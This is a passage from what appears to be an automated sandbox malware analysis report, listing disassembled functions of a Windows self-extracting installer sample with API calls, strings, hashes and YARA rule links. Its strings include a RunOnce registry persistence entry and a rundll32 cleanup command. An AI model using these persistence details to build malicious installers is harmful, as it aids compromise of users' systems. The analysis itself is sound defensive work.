                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00DF18DD), ref: 00DF181A
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00DF182C
                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00DF18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DF18DD), ref: 00DF1855
                                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00DF18DD), ref: 00DF1883
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00DF18DD), ref: 00DF188A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                            • Opcode ID: 6a25aec25cd12a12f10b597f92985678088c26f5ddccf1d92e7c32361a370765
                                                                                                                                                                                                                                                            • Instruction ID: 4b415a1b302290b4ab550b8741b013646adf0cadf86efdb1dc8f0d12350adaee
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a25aec25cd12a12f10b597f92985678088c26f5ddccf1d92e7c32361a370765
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C117275A00309ABDB109FA4EC49ABEBB78EB44751F158169EA05E2390DA319D04C7B1
                                                                                                                                                                                                                                                            Function 00DF7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00DF7182
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00DF7191
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DF719A
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00DF71A3
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00DF71B8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                                            • Opcode ID: 7d6d77915921bed7b00b76af20e14b97b64d48892bc6f3d85c4a74565a30813a
                                                                                                                                                                                                                                                            • Instruction ID: b142c7f61abd28bd1a31f6508542019b7e5d64d56034cf44f7cddb4b7313bba6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d6d77915921bed7b00b76af20e14b97b64d48892bc6f3d85c4a74565a30813a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA111C71D05308DFCB10DFB8EA48AAEB7F4EF58315FA68855D905E7310EA349A04DB61
                                                                                                                                                                                                                                                            Function 00DF6CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DF6E26,00DF1000), ref: 00DF6CF7
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,00DF6E26,00DF1000), ref: 00DF6D00
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00DF6E26,00DF1000), ref: 00DF6D0B
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00DF6E26,00DF1000), ref: 00DF6D12
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                                            • Opcode ID: 8e1539e06827ab39c921b8cd5dd1f855e9494ce6b343ae1438d6055dafb9e0d0
                                                                                                                                                                                                                                                            • Instruction ID: 5a09e9d5f17f4000db56632acf49ef240795887432646868ebc7df6565036571
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e1539e06827ab39c921b8cd5dd1f855e9494ce6b343ae1438d6055dafb9e0d0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95D0C9B2000308BBDB002BE9FC0CA693F28EB48216F46C000F31DC6260CA329451CB72
                                                                                                                                                                                                                                                            Function 00DF3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00DF8598,00000200), ref: 00DF3271
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00DF33E2
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 00DF33F7
                                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00DF3410
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00DF3426
                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00DF342D
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00DF343F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$valid
                                                                                                                                                                                                                                                            • API String ID: 2418873061-2992640235
                                                                                                                                                                                                                                                            • Opcode ID: 1c1a8fa7959c0c7c28d56bd7e7db692baa3cbf9c1bffb100584348c87b8c22a8
                                                                                                                                                                                                                                                            • Instruction ID: 105d711b89ab62681b2328aba95ecbe31b5c0813977a7acf8a7db2a93c40bc4d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1a8fa7959c0c7c28d56bd7e7db692baa3cbf9c1bffb100584348c87b8c22a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3751367034034D7BEB219B395C8CF7B6A98DB86B54F1BC028F749D62D0CAA5CA41E271
                                                                                                                                                                                                                                                            Function 00DF34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00DF3535
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00DF3541
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00DF355F
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00DF1140,00000000,00000020,00000004), ref: 00DF3590
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00DF35C7
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00DF35F1
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00DF35F8
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00DF3610
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00DF3617
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 00DF3623
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00DF8798), ref: 00DF3637
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00DF3671
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 2406144884-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: 91468779e516dd395b0c70bb9f6a8885f27476bf5bcf70ce6943e56630cf944b
                                                                                                                                                                                                                                                            • Instruction ID: e05feea3ecc9e77c917bf541267595b28c8d92461da11ca6f4d02bcc0d741c5c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91468779e516dd395b0c70bb9f6a8885f27476bf5bcf70ce6943e56630cf944b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 103181B1240319BBD7201F29AC4DF3B3A68EB85B41F5BC529FB46D53A0CB718A10DA75
                                                                                                                                                                                                                                                            Function 00DF4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00DF4236
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00DF424C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00DF4263
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00DF427A
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00DF88C0,?,00000001), ref: 00DF429F
                                                                                                                                                                                                                                                            • CharPrevA.USER32(00DF88C0,01BF1181,?,00000001), ref: 00DF42C2
                                                                                                                                                                                                                                                            • CharPrevA.USER32(00DF88C0,00000000,?,00000001), ref: 00DF42D6
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00DF4391
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00DF43A5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                            • Opcode ID: 154be8385f18beee541c68e748af0b44a30786a5716b4d57fb540039951407ba
                                                                                                                                                                                                                                                            • Instruction ID: f91701cb36f0f8262f9f9a7b39d93f5a6dd31818ca676e9bab4840037dc00c6c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 154be8385f18beee541c68e748af0b44a30786a5716b4d57fb540039951407ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41E6B4A40308AFDB11AB64EC84A7F7BB4EB45384F0AC16AEA45A7351CF748C05D776
                                                                                                                                                                                                                                                            Function 00DF2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharUpperA.USER32(7504EDAB,00000000,00000000,00000000), ref: 00DF27A8
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00DF27B5
                                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00DF27BC
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF2829
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00DF1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF2852
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF2870
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DF28A0
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00DF28AA
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 00DF28B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00DF27E4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                            • Opcode ID: 905d115b71ad6a2a35da4caa511f19b02e962d82c46cc328ccf45948d1e55b63
                                                                                                                                                                                                                                                            • Instruction ID: 00384487b27ca24d44b7f420d0fe7fb6c3e99f613963e6b8768189c2dcbff451
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905d115b71ad6a2a35da4caa511f19b02e962d82c46cc328ccf45948d1e55b63
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2041A5B190022CAFDB249B649C85AFA7BBDEF15740F05C0A5F649D2214DB708E85CFB1
                                                                                                                                                                                                                                                            Function 00DF2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00DF22A3
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00DF22D8
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF22F5
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DF2305
                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?), ref: 00DF236E
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DF237A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • wextract_cleanup0, xrefs: 00DF227C, 00DF22CD, 00DF2363
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00DF2321
                                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00DF2299
                                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00DF232D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                                            • API String ID: 3027380567-2036266374
                                                                                                                                                                                                                                                            • Opcode ID: 15b411d1ae3dc36fa8b222d5bf76fa49c0049016a0adeb7a1ceea0b3d9308fc8
                                                                                                                                                                                                                                                            • Instruction ID: 9832a31cbb80551341fcbc0dd039ea5440d7d5c80d86c76af5fd9b1405f47b4a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b411d1ae3dc36fa8b222d5bf76fa49c0049016a0adeb7a1ceea0b3d9308fc8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE31C871A0031CABDB219B54DC49FFA7B7CEB54700F0581A9B64DE6150DE71AB88CA70
                                                                                                                                                                                                                                                            Function 00DF3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00DF313B
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00DF314B
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00DF316A
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 00DF3176
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00DF317D
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00DF3185
                                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00DF3190
                                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00DF30C0), ref: 00DF31A3
                                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00DF31CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 3785188418-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: 03581481f8fd34992e744b8e6d832860dba078db3179c289727751123f92b755
                                                                                                                                                                                                                                                            • Instruction ID: 2d92f9a9a284f0c50e01ea9a3172c188c339f9a2bca543dc3eca3f9644d15477
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03581481f8fd34992e744b8e6d832860dba078db3179c289727751123f92b755
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D511DF71604319BBDB105F28AC0CBBA3A64EB4A720F07C210FA19D12E0DB719B41D676
                                                                                                                                                                                                                                                            Function 00DF18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00DF18DD), ref: 00DF181A
                                                                                                                                                                                                                                                              • Part of subcall function 00DF17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00DF182C
                                                                                                                                                                                                                                                              • Part of subcall function 00DF17EE: AllocateAndInitializeSid.ADVAPI32(00DF18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DF18DD), ref: 00DF1855
                                                                                                                                                                                                                                                              • Part of subcall function 00DF17EE: FreeSid.ADVAPI32(?,?,?,?,00DF18DD), ref: 00DF1883
                                                                                                                                                                                                                                                              • Part of subcall function 00DF17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00DF18DD), ref: 00DF188A
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00DF18EB
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00DF18F2
                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00DF190A
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00DF1918
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00DF192C
                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00DF1944
                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00DF1964
                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00DF197A
                                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00DF199C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00DF19A3
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DF19AD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                                            • Opcode ID: bd4eeb5013b78e74b0c2834515fef1201a031204fd7bc265cab77055bb7dc2a6
